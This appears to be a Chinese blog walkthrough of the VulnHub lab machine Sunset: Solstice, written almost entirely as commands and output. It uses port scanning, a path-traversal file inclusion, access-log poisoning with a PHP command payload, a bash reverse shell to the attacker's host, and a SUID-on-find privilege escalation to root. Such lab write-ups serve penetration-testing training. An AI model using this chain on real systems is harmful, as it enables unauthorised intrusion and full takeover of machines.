PJzhang:vulnhub靶机sunset系列SUNSET:SOLSTICE

猫宁~~~

 

地址：https://www.vulnhub.com/entry/sunset-solstice,499/

关注工具和思路。

nmap 192.168.43.0/24

靶机IP 192.168.43.127

nmap -A -p1-65535 192.168.43.127

21/tcp open ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3128/tcp open squid-http Squid http proxy 4.6
8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
62524/tcp open ftp FreeFloat ftpd 1.00

http://192.168.43.127/
http://192.168.43.127:3128/
http://192.168.43.127:8593/
http://192.168.43.127:54787/

dirb http://192.168.43.127/
nikto -h http://192.168.43.127/

发现文件包含漏洞
http://192.168.43.127:8593/index.php?book=../../../../../../etc/passwd

http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log

nc 192.168.43.127 80，回车输入GET /<?php system($_GET['cmd']); ?> HTTP/1.1
或者GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1

bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'

http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log&cmd=bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'

攻击机nc -lvnp 4444

获取shell
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@solstice:/var/tmp/webserver$

ps aux | grep root

root 427 0.0 2.0 196744 21184 ? S 05:55 0:00 /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/

cd /var/tmp/sv/

printf "<?php\nsystem('chmod o+x /usr/bin/find; chmod +s /usr/bin/find');\n?>" >index.php

curl 127.0.0.1:57/index.php

find . -exec /bin/sh -p \; -quit

whoami
显示root
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)